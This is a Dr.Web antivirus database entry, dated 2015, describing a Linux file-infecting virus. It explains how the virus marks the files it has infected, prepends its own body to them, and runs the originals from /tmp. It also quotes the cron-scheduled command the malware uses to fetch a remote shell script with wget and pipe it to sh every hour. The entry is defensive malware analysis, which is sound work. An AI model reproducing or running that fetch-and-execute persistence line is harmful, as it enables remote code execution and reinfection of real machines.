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Добавлен в вирусную базу Dr.Web: 2015-01-16

Описание добавлено:

A file injector for Linux. It infects files according to the following list:


This virus tries to open a file from the list, loads it into the memory and searches for the line “Good luck, Ebola-chan!”. If the line is found, the malicious program goes to the next file. Otherwise, the virus records its body into the file, and then records the original file content. When launching the infected file, this malware saves the original one into the /tmp/ folder and launches it. Once the original file is executed, a file injector removes it from the folder.

Using the Cron (/etc/cron.hourly/0) service, the virus schedules the task to execute the following script in 1-hour intervals:

wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>dev/null|sh>dev/null 2>&1

The downloaded file is a sh-script designed to run on the infected machine.

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